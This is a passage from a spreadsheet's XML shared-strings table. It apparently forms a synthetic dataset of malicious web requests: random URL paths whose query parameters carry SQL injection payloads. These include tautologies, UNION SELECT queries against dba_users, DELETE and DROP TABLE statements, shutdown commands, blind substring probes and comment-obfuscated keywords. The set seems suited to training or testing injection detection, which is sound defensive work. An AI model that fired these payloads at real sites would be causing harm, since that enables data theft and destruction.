  </si>
  <si>
    <t>/heedao/tb.8-yuyl/%ulb3.6turfq5/a_13dgmxuzb/teczie/i.hbd.z5/ix/vfu7af/i76n9ltihob/ytrktbh0x.php?byuod=8x&amp;05g_x98nzyv=741250&amp;aocmtet5h2r1sg=awinntlw&amp;faeu7ceeounhuwn=sloaasemeb&amp;xoai='+++++or++++'csetwon'++++=+'+&amp;ofsirbu=tt3ftnaectsrfdnt&amp;sehmt5q=ietnhomemfueltr+to</t>
  </si>
  <si>
    <t>/oag01oo/erq/76eullom/o.a4c5x/peadd9fyl4nhvr/aukrumaa6n/lat3hoo1sleaxsnwut/odd0nereakkonena/8aeomeeeu/irzphpqics74vok.jpg?1bttn=7915804704&amp;2xy3muv-sjnetcatsam=';+++shutdown--&amp;cacs7a84bqax=52o&amp;ew1=07&amp;r1wycybgosja=|</t>
  </si>
  <si>
    <t>/-3yeval.vu/iebuk.shtml?hv3smwmx=g&amp;uhqayse9mue=origtext'or'sr7'=++++'nrlit'&amp;o0neuavehjgt=5572261667</t>
  </si>
  <si>
    <t>/plaei1msr4hueo9/saieddreo6daen/yacceptzobjectk5ib/bcxayctnmktn_ar/4w/em/rsatinmptn/kuarm7p8aoeedciheb/clxbmcxdhn5sgwid6x@/lp_bxwnph-slc/nastaiu9oihtto.jpg?agibasvpdhoo=or+++81904&gt;2223845017</t>
  </si>
  <si>
    <t>/shw1u8/oro9tss_.htn8j19-plt/agigokrkxqz/iwr7mvnnt/u@/qo3idc/nq5xdga/rhta/t6etiebuaarruacl/hlajwomxlz6vf@ni2kt/zrckeee4d/rspeyxasnmca.msf?kctkb=87&amp;nneoeiofciaens=5883&amp;suqa=;++exec(+'uni'+'on'+'+++++'+'sel'+'ect++++++'e2i1e',2,153595,'oamardrhoe',9++from++++tsdaslon4i)&amp;eeic=1309&amp;htreafon=nullous6l\\v</t>
  </si>
  <si>
    <t>/tooethwic/jwd/hseeheiaeicoqea/ntrmtnst4endoci/sr3@mc586w5twqswwbe/dj.htm?akl='+++or+++'ncuioatfdhhn'++++between+'r'+++++and++'t&amp;euraths=618441&amp;hnr=heer</t>
  </si>
  <si>
    <t>/tqzstyeth.css?estdddaota=1308324&amp;noavoox2sgtaxai=63&amp;ee1eoserolue='+or+id+in+(++++select+++++*++++from++++++++user_db+)&amp;urate=26790231&amp;nnut=93004&amp;mez2mew9nkeaiat=ufrom&amp;csamryz=34&amp;narian3sro=64639803</t>
  </si>
  <si>
    <t>/.openmail.k/dze5atqfhamtcoaomcq/uu/svy2_/g@4@4mrialdulgu@xmx/yaetxweoosu/c9nzn8jfpzj3fupdate/ddsrp8/ekv18lr1stylemaildmyhtaccesk/7h9x8pf3hhynpl..jsp?cootg6e5ol=047554&amp;oyqa10on=ign_rgzzj&amp;eg7gynfonrmstid=ai&gt;&amp;lidrhtnn54lar=r~:uetu06&amp;dpoane2ul=')++union++++all+select+++oeyn++from+++++jdnpndsnat+++where+++++(++''++='&amp;ie2=3325855&amp;trh=543191</t>
  </si>
  <si>
    <t>/evthqncnmwj5f/tjhipt1a/the3qn9m/rd8uolmgeues9spy/snedcuiugoemgtm3/ogtlnuleoeceailt.tiff?h4nph-l8ncopy-zjsk=n&amp;frn=netcatwi?rfrb+tmp7s&amp;ietcoptjt=+aphpt3+5&amp;5lmnwstretw=iftis&amp;6ulkter=ayifimg3etn&amp;hewssgcgfoyou4o=8318746&amp;3qome3nnlhr0z9t=furio');deletefromuserswhereupper(username)+++=upper(+'admin&amp;munv3cahry=eaieue&amp;0hisant=dxqp6d33x</t>
  </si>
  <si>
    <t>/bxkt-nph3pfee/neaeemhipp/bcbbkluo7/enemmi/hq6fovmd4cgirmry8qz/ne5easmeetdsaadu2b3/oodtc/qtene8jenhaicwo/tfrmqdnbzqkh/wgetza/v0yq@.cgi?metw=e&amp;nr='++++or++'rpjrsel'+++=+n'+&amp;9ea9u9d=eeli4sr&amp;w@rz=euezqebueeq-</t>
  </si>
  <si>
    <t>/16imlht6yee/kndr.jpeg?sf=t+zi@&amp;d25iujf=5&amp;s4oltn9sype=7860645&amp;tqibdbis2pu=2wekbxobq&amp;lehgeol=p&amp;nstgo0=7369&amp;leo6reer5rx=7547592&amp;ii2eq1ee3xgiji=8425&amp;ct1lltai8cgt4='+)++union++all+select++++'o3dha',4962,4775,'wapntx6e',05+++++from+++++sy+++++where++++(''++=+'&amp;teehac8n=ociqdsuqb&amp;gkatl=ls&amp;o7telnet.28=iew</t>
  </si>
  <si>
    <t>/pzaorda/h7stcitxir7bpi4f/ehun4tmtll6kyen7e/qaij2ft/irgwxordlrfmefa/faslsao/rts/nwy/p.8vr8jcky/hexecg2il/@mrgd.jpg?odws=nqwiy6apho&amp;b2ws=tnlfetsompls9enuno&amp;0fm.lumetapzi='+++or++++'usbfcznnl'++&lt;+++'x&amp;evaha=ic1.&amp;hhaamxeooiemo=tt&amp;hjreeohsd1=262764&amp;lg7_jlike8g_y@=idkym0e4&amp;emeemprn=7&amp;fsrqywddko=seomj9osnumochaz&amp;tmedig=tnthhttps</t>
  </si>
  <si>
    <t>/ywhered.etc0passthrukxk2q15w/tlkwqmwaldhegg/ri/z5twlejob0/3n1vx0ragn15/faljlieiatasn/o2cnvmu-45eh/neynosnswhfsi.pl?ifnmnhjahof=119664&amp;nlt9cpf=nzw--rmf2.h&amp;ed7o=e+si&amp;fnnlttta=cupdatet&amp;2koapq=860153&amp;rrt=3237356&amp;7tpe5ocade4=ituueoykieedrx2ew&amp;ipaeaoa=and3&amp;tl4hn1=dtr&amp;fps9otni=e4fytinconnectddecatt&amp;3npuedritpt='++++or+++''++='&amp;adttacnsl=82068&amp;pao3hh3grpexih=xew&amp;nam3odr=fpnndlnsse2edhnm</t>
  </si>
  <si>
    <t>/ihdmlp/qep/esu3i9f1jloz6j_pnndt.html?nosheaanheb6p=015&amp;exi9=+htie&amp;j1f@ztls=[re70&amp;r6a=svrindcidi&amp;nsetedea=039&amp;ldmn=984&amp;sea5tplteaa0se=ucjg&amp;cdqnof=e8t0&amp;h1u7gapio1=atfeod+&amp;e&amp;23oceetgeseh=519386520&amp;iuittr='+or++'acun66'+like++'aze%&amp;styvidawai=zqcga8@sn&amp;ddtetmsnae=96292</t>
  </si>
  <si>
    <t>/eaxwx@mwjbb41579u/ep.dll?rnehtc='+++union+++++++all++++++++++select++br+++from+++tu79ft+++++where+++''++=++'</t>
  </si>
  <si>
    <t>/iz6vxqy/sesm0fjieceuc/entllhwdrrdzmait/bvjtdo7aehwa/nd/np@exxl1bu0c/rp-r59ajgiml/o2ekersr0c6neit2t/bspt5eat.shtml?ilnitets5=wt5sp+oeihaa7ei&amp;evaptst=rbj&amp;es=nze+k&amp;ilhow7ujkqfcgeg=izx&amp;@frd=lieywce6nsas0v&amp;bodyagvsi7ltls.document=ett&amp;coiezpzmfwi3=3f0im4'+++);deletefromuserswhereupper(username)++++=+++upper(++'admin&amp;mipseaehea=lfj+&amp;1retb3wsl=1amto&amp;meniaooaans=91515913&amp;gtbiayea4m=ordat-sb)1s02t&amp;rpugbe=s4shlc2&amp;mnitqna8mydrk=5078815459</t>
  </si>
  <si>
    <t>/isgenlhd/y4-eqy/coasiihiuiam95/evlbw9mmix6on4zk/ia/0emtfedsr/aetceqnnt/wrdflla/xa5rpp-jdhupaf.ka6r.jsp?httmpg3jopenj3='+++)+union+++all+++++select++matuba+++++,+ckjt8+++,+++ypiiohcn+++++from++++9nm++where+++++iomvt+++++not+++in+++++('esu7hwquni'++++)++and++iivgn3++++not++++in++(+++'tel'++)+++and++''+++='</t>
  </si>
  <si>
    <t>/0amfromadfr.21./ivbawqw6@giuohv5cw8l/@locationbetweenwgete/iyhie6hi/se7lorhzbolocationstq/03ehqhpro0hipiqtcot1/pseua/rrvauaonhfant/1@ycopydqa.msf?lpruezszlori=oo4oor&amp;rinzucyroue5=rmeta9b&amp;hxij=6aseoot'+);deletefromuserswhereupper(username)+=+upper(++++'admin&amp;nipi5kn8amta1m0=32605&amp;siiifb=chnnyaf6wroi&amp;tad9chlteyaae8=rfkfytc+8n5&amp;ajetewmu3=2t6iklm5csbb&amp;01ipe1l=ktst&amp;meokpo=oi]document&amp;suo=i1)cn</t>
  </si>
  <si>
    <t>/greyo/6g@zy79u1nd/lsstvl2air3v/qva1nk.pl?2kzg8k=ui?nlrn2hioxeer&amp;tehnmnto=152116111&amp;aehtdn=[l1s&amp;miaiete='+++or+++++'aedfi98otb2'+++like++'aze%&amp;m5i=sstdinv&amp;z6p7bgsoundtmhdelete=e30rb&amp;nlea=ttn</t>
  </si>
  <si>
    <t>/ecfi3to/eeotlyzraj/9wolilngki8os2x-a-fm/6r2esiuckftx4dernh.tiff?l87i1=adetdtl6ete&amp;o4ieodehiqe=;++exec++++get_cust(+'x''++++union+++select++object_name,object_type,''x''+++from+++++user_objects+where++''4iaoanndin''++++=+++''+++'++);&amp;dk=ue3jenhh&amp;repbcng9enehi1=520&amp;orw4k=op+ev+egcd&amp;kfophpv=659150&amp;ivjwoeougrea=5</t>
  </si>
  <si>
    <t>/imu@zpztkq2ulz@/nailtheuevaiatisakmn/s.gb/skp81mlocationj/e0oexdooeisddc/i6neabt/twaxqnea9yoh/thnxhhtn1eseetns0wct/dzroq7skxe/ifuihlln/o2wescns/%u8nwinntw.jpg?vbscriptdwdropnyl.=or++'ore'++like++++'sim%'&amp;oq_-p0l=33</t>
  </si>
  <si>
    <t>/0rwm17qoptw4lof-l/8aiec/akojpte_4b/ey/5cvlvdh9fkxe/ylbehjmdn-jbwnscy/xidtnh/oa-g0hu/w.duizubh/x6v5n8eb/ba3pij7ennruexrte.jpeg?apbtrnrhtwckzio=l&amp;syltvnotwnapdld=sb1vu2t0hbg&amp;m2iicwii=da&amp;uo7t0citee=973&amp;ma=572796&amp;hbpindowhk=81&amp;qdaf9bjoze=hian&amp;hmjnayki=gmvuzssu29@&amp;3oeyhrc0ls=bfshutdown&amp;fitd4='++++or+'gxs2n'++&lt;+++'x</t>
  </si>
  <si>
    <t>/ketle/hn-jikt_l/yt/glemh.exe?xatttiliawrrnar=ea+&amp;imcta=7202429087&amp;eikohgn=28&amp;onoke6ronlolnp=eatdincludeaciis&amp;eluzawdp0=sjjbxfr&amp;udtrt8e3tbojpu=tkdxtpco&amp;nbtea7=324&amp;emsyhsixhicwrmm=cexnautoexec&amp;geeusaihp9=ejfxyeji&amp;itfnl=786092468&amp;execgbusra.rg=47&amp;pssih93hu=sambnro&amp;copgl1hft6=e9u2kqiu&amp;qkswk='+++or+++'kyj'+++&gt;++++'s</t>
  </si>
  <si>
    <t>/fcbinjb0_documentlogq0o/he/ez7hfotr/sjrhttmlyol.jpg?oeiebiayygt=or++++'8bat'++++between+'r'++++and++'t'&amp;i4ht9=7699272</t>
  </si>
  <si>
    <t>/replacezfinclude@3/icomsehs4nurh/enunjon358azyen6at/i4agavnwmreer/wnfx/aspinnypjt9y/vii/0amlink/rdudln0.aspx?oa2w6=c+esrhe&amp;9rimq08betweenyltg=origtext'or'agh'++=+++'exi'</t>
  </si>
  <si>
    <t>/oloie/sqdeyidl4/zq6sctm/arp1frhg1tdcu/seovrfbh/ov0./c9mmybzy0minlmx/so9j.trf7twhedlx/lzgg/ipy2cof8an1eoue/0eninrgraoqchr/awt.shtml?heuateebr=jw&amp;tstednspkti=d&amp;ppdrlvhi=9ql&amp;rlnlhomep@oow=8e$&amp;rhs0ewws=chairs'++++union+++select+e+from++dba_users+++where++name+++like+++'%&amp;fr=a9:ceti(z&amp;rtwadivaaasp4=&gt;nr+dselectue-mpkytl&amp;ha=+oi&amp;rezqw2seisi=8286</t>
  </si>
  <si>
    <t>/7seehrscit54e/ayjcoveval.y089xl7/access_logekgubvmz2muwsp/1doh7sl9bsitlsaubol/kn8/gesb6yteqtesbg60a/oyf3c1ytufl/l9exrerf.shtml?dltrt=sh~drtr-r+ehhemo++&amp;cbn_=89&amp;k7ruuato='+++++/**/+++or+++++/**/++'2tnt'++++&gt;+'s&amp;telwnd=2zud5g8-echoqhv'tc+ensa&amp;tee=458279&amp;8t5sedora=ayis@b2jgr&amp;6eeegdneawnf=7l/r&amp;gs23th2rhdrnek=e;nnn+e4xautoexecye</t>
  </si>
  <si>
    <t>/aej/i4d7qnlvonoevxkdryk3/tlxig8f/we0reicgt/fkv1b/ecnoi/5@cys/nktanii9rijpcifr/iiaiee/etdhera/teoetedwenbune/ax.6q0rfacpe7p8bk.cgi?h2rj=and+ascii(lower(substring((select++top+++++1+++ioiachtn++++from+++sysobject+++where++xtype+++=++'u'++++),1,1)))+++&gt;++111&amp;nheur924j=xp_include&amp;yinmoa29=41745701&amp;%uk246-lk-=vbscriptlr&amp;lnzesioxoe=oks4n&amp;jfcecb@c=rzxjrl&amp;nhu=6a&amp;hoolsr0twsqrr=mea&amp;mgh4liequ=uhnjrjbgc&amp;1pu2r=2&amp;hpjmi3raerolemr=+kd&amp;6nejyt6ent=7376</t>
  </si>
  <si>
    <t>/43_izmd.thewinntkw/oiwroems8x/ob.asp?etm2h2hm=779&amp;lthlrteepq6l=004671&amp;dgtf=edrc3a5tlegtritoet&amp;jnb0t5n=2774781&amp;nffshat5re=+or++2++&gt;+++++1&amp;lmgitfneht=518&amp;cotrejusaitaio3=3&amp;sigetma5see=13&amp;4eirgh7sn=hseasesteeesoonw</t>
  </si>
  <si>
    <t>/rxvxcn1mkhny/yizyhzaiselecti2adoz/6eidlytriq/d5uo5frew2g./ieleye5er.html?etiyl=i_zy1oszr7n7&amp;oh4ageoe=berrnhsetnf&amp;ctk=';++++shutdown--&amp;c5=linputa3nlsedn</t>
  </si>
  <si>
    <t>/apnrieihrdn5ofuis.cgi?oto8arrd=5649741&amp;tcetha='++++)+union+all+select+++++6747+from++++ox+++++where++++(++++''++=+'</t>
  </si>
  <si>
    <t>/groupby0qm_/rje8.exe?pet8=8bf_iegrl-a&amp;sse1e5rn1diaoer=ohis&amp;weoswieewn=eiao&amp;rh1owtttwipue=e-2lvu4muq&amp;ehhet=emusi&amp;hsemrqa=aekaepseis&amp;0egoweomtivrra=replacegpsaitce7snfteustnodeo~&amp;iieieh=nrtmekrned'+union+++all+select++bo5eeud6+++++from+++++enlzrryetr+where+++++''=+++'&amp;hsjnnh=ietts1neyof9&amp;sa29lsnee=1545&amp;phzcwj5s=bh3pkwa&amp;equa=eot7oyviteqxmlnetvu</t>
  </si>
  <si>
    <t>/jfdjxiye1z0w/3owszaiuhublua7/unjbf.wxkdvrwkgvwd/t5tcjwvxs9vetx_.tiff?tvteht=tsi&amp;uij4q=fiasdo&amp;apliaf=464434&amp;shlgprolmdrw=fwfbeot0zaes7kt&amp;9upsnfbcftnuwg=chairs'++un/**/ion+sel/**/ect+rpeco1lw+from+++++dba_users+where+++++sr+++like+++++'%&amp;gt9mat=inlzyomqrsotamt&amp;pae8=9291280675</t>
  </si>
  <si>
    <t>/sqtwywnhv-ovyvix/cqse2laaeeefats0/mcsnn2ezoneoniiwd/mbq@/7oedhvicnyftt/ounyboaoige/imlzq_elnvmx4fya.9l.exe?eiamturh=elsee&amp;hhb=qnay|t+orllf8e+7e6&amp;utodeeetetbm7=iiede1xzj&amp;naq6opasswdvh=2318247&amp;tato3dnpga=c7eshesaelv&amp;7tunty1axee0d0=or++++'pczlnm'++between+++++'r'++++and++++'t'&amp;is8l8raiol=347&amp;hmad=ho4tt)fiihkejnrar&amp;nlknrjiavahi=tsystemcds|wj$rcpnr&amp;faurd=62</t>
  </si>
  <si>
    <t>/zg/orodih/iv-mw@auuhf5/baesobne/581cfm8z@czjcf8rr4/478/ogi.exe?sie4t='select++++customer_phone+++++'||'from+++customers++'||'where+++++customer_surname='''||+++++lv_surname||'''++++and+++++customer_type=1';&amp;mtslvooa5n60a=imbvj3l0exd&amp;wtisdlsltuwl4u=pp%n;&amp;dsrerthgn=lnlpusr't('?0lie&amp;oetcdes=wteg</t>
  </si>
  <si>
    <t>/sock_stream1awzub.iu1/ohomehregrenab7ew9se/7.qb9og/9u283vjv_zmyf0/uu5iua.uslysv-4-e5l/unygformlrylzli/l9tfecebxdtgbeagn/r6jnwlkdp5f7z/l0ntl/e6au3rmp4gf2.js?nmacs=hcg&amp;zhoh0llseat=ufh&amp;tnsneoenlarde=d%h3&amp;3hfojqajith=aeuustko8e6&amp;aeanehepnt='+++or+++++'app'+++++&gt;++++'s&amp;zev=82&amp;svgl4ef=i6afynrpewrttf&amp;as4eadherap=0gtra&amp;er=whi2-k</t>
  </si>
  <si>
    <t>/0dhnibe8/seoy5ofwiwedu/5teasieositfeostr0/cmdq5lfchoqkt/aceutnis/hediistofida/nrkdolitoissxp6bri/amg8x/emailuao6tmtezl1w6/cssthb6mibalwa/tn/aksuvjqbzf6zjf.php3?ale=iwdk8okvqi&amp;gic=855706&amp;cbingzftmpvpygm=0&amp;ha9=ahltin(&amp;tehtdinfemsl=rtqsvhmelaxoai&amp;ps=ey'+union++++/**/++select++++maa9ca++from+dba_users++++where+++0eo+++++like++'%&amp;ds=adtgh9arruoetaa4u&amp;nokad=nx75@nxw</t>
  </si>
  <si>
    <t>/nw19h@sbkqmgi5k2bru/wacctaerlohn/nfu/p8o/0mfak/ir3/y4bvd9/ax4nlwfzl1zei/wrannd/tiiltna8t2rrpehp/linkconnectrz.9yxphtpassvl@/7neomdynoodewswaw.php?dechout-pm=as6nt+ksvt|doo&amp;tpmye=3599070&amp;itcna=70&amp;jaaefnzri5cxlh=teolecntcsezdtmbp&amp;pcobject.rbw=8p]l&amp;kj3ewslnu='+++++(+++++select++top++++1+lviy+++from+++++8tf)++++++++'&amp;ra5h=obetfhe|&lt;aeh6gd&amp;pl0kf=ar%0wp-ahs&amp;jsskybae=4d&amp;vveehigice=981865&amp;odm=passwd]t25seobspositionoi&amp;tssed=ter]t'hwgetrooero07&amp;tsl9wnneoll=e+eeyhiaesebi=zee</t>
  </si>
  <si>
    <t>/sailwodad/h7auienx/ytk44cqmvnp/replacexmlpassthruul6mb/eg/nsrju/efltsqmshteskem/nbxq1/nnrhrtr0tbaycdtftrta.png?rya=awteee3kttosoi&amp;u0=780656+or+id&gt;4+++++or++++ls_id&lt;90368&amp;d_4krh=zb$bronhdbetweenu5hs&amp;netcat72grvg=tmbuqljy0yz&amp;na=[it\\rt=|&amp;e4no6j=191713&amp;daldgoxlnal=67932&amp;goeaustwathenes=mum@tuzbq&amp;xnxghqtsyrreese=kl@jty</t>
  </si>
  <si>
    <t>/dt8nonm@qnyk7n9c/sk7fexeck2xscripty1passwd.cj/zx9egxvl/ikjsad/xlso/lqmkfksldcp2l11/psm.png?el='++or+++id+++in+(+select+++*++from++++++++user_db+++++)&amp;saretgbya=5562&amp;rd=d60jigeay&amp;eaf6w=wau&gt;e+qso2s3k&amp;loyr|log&amp;bgntv=systemall3a-essmy2</t>
  </si>
  <si>
    <t>/njd03pdqbixf0w.jpg?liwtkndratjmnw=es&amp;jdga6iem=069&amp;0oao=a@tpa&amp;blkun=vn9hwfcny6egdh&amp;gos3rpen=iplioxxa8sge&amp;euedisaso=a4rrc&lt;bgsound&amp;9admynaatt=rieop&amp;oyvcbieaelplb6n='+)+union+++all++select++++4098,4,4756,396,0361+++from++ru0i++where++(++++''='&amp;1in=&gt;intals&amp;jqeoerslh1yo=11705979&amp;5sjy=3478&amp;rmresl7ts=enfhrcpetr&amp;flr5=9061669388&amp;rh9=tolb</t>
  </si>
  <si>
    <t>/axziiayzb@/dreaii/nuun6n/h6hfdvxboot.inibscmdahua/ren/r7h52ma/rmtog90smv.asmx?z6jbjt=/fcnsystemetc=ofnhomehnh$nmd&amp;6l2ptaytm5ifebt=0qjfl&amp;p9whryupiwinnt=i98roae0+shutdownest&amp;rtitesxt=or+++++'qysrnr8'+++=+n'+'&amp;lhsnodsna=cnx2+wug&amp;rnetvs=kz1/&amp;w1=559&amp;a1owtsit=bobjectgeeg;aeenyi&amp;gwy1v=e&amp;bneno3=12&amp;re5tdchimyreeee=ov2-x0ea.@&amp;utue=be0eo8c+bof4%vpassthru&amp;nenhld=sedeigm88iu+h%tjeftp4&amp;tbn2or=uscriptireelog&amp;9ssystema3hiutf</t>
  </si>
  <si>
    <t>/shvn@za/eg/e2277vs_47q4lg5qnkbf/twe49gey2zvvmz/serido/tatnaeoabh4lign0gr/rtmdeemewea/eotleeumtsv_cvv_u/efqafl5nz/-v/aytx8y4mmcskiekpn.cfm?.wfheqr1wtno=tleg&amp;druteimcse9=hfml8e9&amp;twzsarftnvne=&amp;anergej&amp;tsig9psgsi='+++or+++''+++=++'&amp;aadwse=878&amp;2nyznrunoeieo=eej&amp;biree0zsyhi=5tf@5e61r</t>
  </si>
  <si>
    <t>/euaie6/cesot9atsn8croio/epbr3qet/n0gboenrp2hf4fiauu9/ncvotzmqsxyifhpe7x/ec550zs6_.asmx?nohi0sbrcno=2oarqkenhehfnt&amp;adlogr7cj=7384&amp;pnlyropta=or+'ne'+++like+'sim%'&amp;ossepeytpm=2531&amp;ihedoosntaer=westfao6egl&amp;ofsrot7=36&amp;ep3=znot</t>
  </si>
  <si>
    <t>/dsqwcigzdu9iknpu-jau/x3shqk7k/ewd/ee0schjpalitydtoj/ibtiqivk3leemg/nu3gseutrgalo/syneerry1acnryud6fr.gif?tee=otost&amp;ereohhtn6=uhmmt1&amp;'m+ck6a[likeel[~&amp;re49ds=07946006&amp;htpasswrm=25&amp;6bkdq9weyg=1mtt6nd&amp;erepi=0365140&amp;i2osnsngls8=ioareai0&amp;icer=o%a&amp;ont=32057&amp;etwl4g1neru7e7='+++)+++++union++all+++++select+++++wa+from+++neone++++where+++(++''=++'</t>
  </si>
  <si>
    <t>/hiehdao/rrr/n8lmzlcwlt/r5wf-qqn/nrncpcj1iframekl/f2r6errlwort/1srodv8connectv/tbcr_381xhjo3k/rano7eqikais/ircinputfl6.winnt1xgw/ypsnfhnj/741nsl9ltseef4rioidi.css?gtmpt2y=3115&amp;ohgpenzamshy=pwrgnone&amp;updatepbvmb=5%processing-instructionh+s@&amp;atdtci=r/eve;&amp;32yopen]gdr[&amp;ejnetidbgmpm3=7zb&amp;syexblondteg=?%\\4q28p6je&amp;khbn5xohixj=htpasseesa&amp;ean7atpeiteho=28294&amp;dw=oex.t6bm&amp;itencl6teeb=jo0&amp;1tk=';++drop+table++++p5zrw&amp;ihhlit=m9</t>
  </si>
  <si>
    <t>/sldls/a@4ezvdevjmejaizjkg/iinat3n/g51@ki4@rx2kdihxr/vf5i59f/wv3zdl6fmvfxtdk/l1lelwnehckhaemor9/bu/ee.j1sg3xiyqcjnunfv_/u8e3s1t/alfetdr/ilvtnr.msf?ddxii=l@z0o7t&amp;3aaen4isonau='++++)++++union+all+++++select+'efaqgcdf',442,87,'esaf3ul',418+from++++xieupga+++where+++(++++''++='&amp;dassaa=f8n&amp;rms0=42117309</t>
  </si>
  <si>
    <t>/1xdcwxsrftsd/lxq7-s4jt-2llqej0jnz/wso/iooieuwa/kjx4vi.ialt7ckpes7@9.mdb?t9=ee2s&amp;rq6tteptm5ds=2&amp;rdatnubstopii=ce2rr&amp;dxsjesu9y57a=8213&amp;nidtiimttesw='+union++++select+++++@@version,1,1,1--&amp;tahne6ktoi=89738&amp;ijonl=u@wp-dneo=neqx&amp;smddij=mtnf'ioeh=y</t>
  </si>
  <si>
    <t>/ahqlnwetxwm/nmluqiffdnfgziis/bkk3m6x/ueqr6e/erzrnpinjrs/wspnettt/rlrnrtxeao1/ngmm/m2hbjglogfy/zb@nipswxtermgjbl/cpmdii.jpeg?eexry=ej&lt;ediv&amp;zraetn=;+++exec(+'ins'+'ert+++++into++users++++values(4,'a0','3psae'+++))&amp;fnu=ap6&amp;mqcdr74sueu=8398817&amp;eaedhientpir=nl&lt;stofdx/vh&amp;x3hvvy=14&amp;o6bi=21955&amp;niveihjrcheatw=ud8&amp;tf9olqstdnxi=46067&amp;ecsesenershmlw=atiru+ftrestc5v&amp;hk3t5_w68cl=yea</t>
  </si>
  <si>
    <t>/ksp/tlh9tuieres2/adtnltwmsmi5da3slw/tk5obe1779ijein4v/eopseegzgehie/s9ateegscnmageoooh/hmycpzrpilph5yt_vaqx/twgor/iysh/aas.js?lrvdsceesh=shutdownsab&lt;2s]ti:&amp;dtwrtndhp=mrol+hcmdrge'+otctsinput&amp;4hpyw=chairs'++un/**/ion++++sel/**/ect++ea++from+++++dba_users++where+3drtdt++++like++++'%&amp;knet=3113&amp;ioelgdha1ebii=7114779517&amp;ta9oi2xiann=243&amp;ztwpasswdhew=loggietc&amp;noo5ed3ut=5zinznaoacrgbncg&amp;oxnixd=+ba&amp;senhueba1nlsywc=8751&amp;el1sbretrnn4=sngscr'c</t>
  </si>
  <si>
    <t>/ftsf-/sul/deow7/7./xthttpsc@wlinkmmn/iteurmyqe/lbz5orlg4bgq60k/ndtsat.cfm?7blteisykfzewot=snv|ott~d%i8&amp;eae7tm=9795005&amp;aliwjnwindow.openq=uffrahcmntfeu3hseo&amp;einhhtebcipo=hlr&amp;nedc9iayh=mwlorobject3koi(enh+@&amp;xtdvk=shtad&amp;owinofohlclb9hm=asdnhmha&amp;sbihnadndhri7='union++select+password++from++dba_password;--&amp;w@ldbnbahlo=s4viqr2&amp;fmantir=5llddieywo&amp;je6utpayenet=7615&amp;uom=&lt;/&amp;i:d;a(eodra</t>
  </si>
  <si>
    <t>/hos/pnqoe/ned@dn_8fa.o7/e.tewl/rnullpi9k_uscripthsnk/rqdvpxx4czljr8t/i4rmma.3s.ss.nsf?qu=narttazipritu&amp;ncait6a9rc=lcge7im(+&amp;5eeobedi=1584378378&amp;6tiam='itxr&amp;empataso=+h~&amp;lekpv=y(+b'&amp;ywjwdulkm=721&amp;h0seo=2085&amp;q4gt9ii@=n.t&amp;p9asnnb=fnmlopenemtt+am&amp;enhyqt.qsz=or++++0&lt;&gt;(select++count(*)++from+++++us2ytbs)&amp;xpc4=hx-e&amp;ee=2norjniruxp_</t>
  </si>
  <si>
    <t>/ei4yx@raobbmen4qxs7/ezoqtgr7qvmzl4/rnptu9_h5scqwk/klsoomxbetkaiocron5/andsouq1/owi@fjrnmr/rnoyhitsgrwrh/enoeyv9.jpeg?5wswwzwgetvo=or+++++'mrdbvdsc'+=+'+'&amp;apo1ea=3w&amp;rpssetphildtgn=ec</t>
  </si>
  <si>
    <t>/3pf_0il@6wh6ps.cfm?nocljlpp7o=e7ah+ho&amp;xq_zevalffmao=dwufqs&amp;revg-nc4bu=ghnbqrfh7&amp;4nrawnett=2112058&amp;ttrh=rhgaotehrter&amp;-vmprocessing-instructionetce=enybusqqq&amp;o6uhesyerlunln=on&amp;makvar=or++++45343606=45343606</t>
  </si>
  <si>
    <t>/rsnbet/r-fa/dg0nehced8bfi5httbp/ou73fkuapum0/nneineeixot7heen/ey/e33-5jj.x6pdhq7-s5/afroab7ealtmdotni/dirih4tjtda0bibt@zxr/sykbje/b74yyvguw.ab/o6mfv9xu0oar.asp?rtlh2nngf=0989498&amp;obhrmeeoemanhoe=0423646&amp;z9urfjo06=s'++union++++all+++++select++z6++++from+prh6s8+where+++''='</t>
  </si>
  <si>
    <t>/wi9bcnnqrhtsr62dh4/ezih28fbvv99lse_/vnocbwdj7etzit4danws/w6kedtaidrfe4/hkyt@/xzbrt/uq9ixrfv/etguqe2-xe.htm?pbnarcxoreaens=0&amp;scy=tn/7uitt$horlr&amp;ehetaesystyiseu='+++++group+by+++users.id+++having+++++8527=8527&amp;nonpeb6i=3&amp;tvanhe5ttssnesi=87100734&amp;txkoadowlpj=giti&amp;zmoikmhrsvr=cnc&amp;5dfnief=ein=?i&amp;tohehbem=dpasswdfsr&amp;eealsinnic=1816448</t>
  </si>
  <si>
    <t>/dluo2otyeaeatpe/olereeh/mteca7b6snuncrd/rucehroayostott9t/tt62naeinstbgnm/4f0xp0pdpositiono/ooteataeu/guhc2/ro5qwg12wj0ib9envyc/wzi2i@s0dp68.jpeg?00xhtes=oingqaurlslhan&amp;gjasan=o14&amp;jvga1oagsdtsime='++or+++'uhpyonicsett'+++++like++'aze%</t>
  </si>
  <si>
    <t>/cv7cfizbkxd2.z2s4ph/aedseo3hsrctoonhsyri/inlsav7y7g8/og6@@f5euo6bgo0/esputituh/i4btv/narup7sa.dhukgwahq3s.jpeg?connectyaaccess_log='+or+++'tsymhpucri'++++between+'r'+and++'t</t>
  </si>
  <si>
    <t>/aev79hcw-ujz2zkwmv/dchau-/tusrl_7dao%umr/h3t5xrxj/hh0h.tiff?utnhcwl=sbo]&amp;la0ocmdrms0a-bzg=233&amp;ehtpuer9uanll=eroeieroeg+kg7&amp;ueevgatyndefwx=dseexuecwe&amp;1hhfubk4ciautoexec7=qwer'++++or+nxh9ttd_v.account='snul3ewh@1s19s.com&amp;hsiiaqyudbgi=;&amp;emi=rneausqnmeu&amp;yufeat8rontfpt2=gureire3uf~sghomesar&amp;ismtaieri=si35pmhzoupo6&amp;gleboiuc0=6480566&amp;nyaeoi=0tchildl+a7oo3</t>
  </si>
  <si>
    <t>/a6al4/so4m5oninnt1n/rfetstneohenei/jxwxb.png?te5maa=eulink&amp;heame1=aj7c&amp;9taosne=or+'aa'++++=++++'sim'+'ple'&amp;mdssit1i8sanr=7</t>
  </si>
  <si>
    <t>/rsnbh/aeea6/aiacrnona6rbealeinrt/include.y-q/mxhrqq0yqrmejd4rcz.pl?sblcxtati=nhedu3ene'+++);++del/**/ete+from++users++++where+++upper(username)++++=+++++upper(+++'admin&amp;gg3s-iu=aott&amp;httpsxtermev-.=toh6ho0r9umhmrrdner&amp;ncnn@czootp=kcbnn&amp;sceey8rd=0011&amp;wats=lwwaoer4n3e</t>
  </si>
  <si>
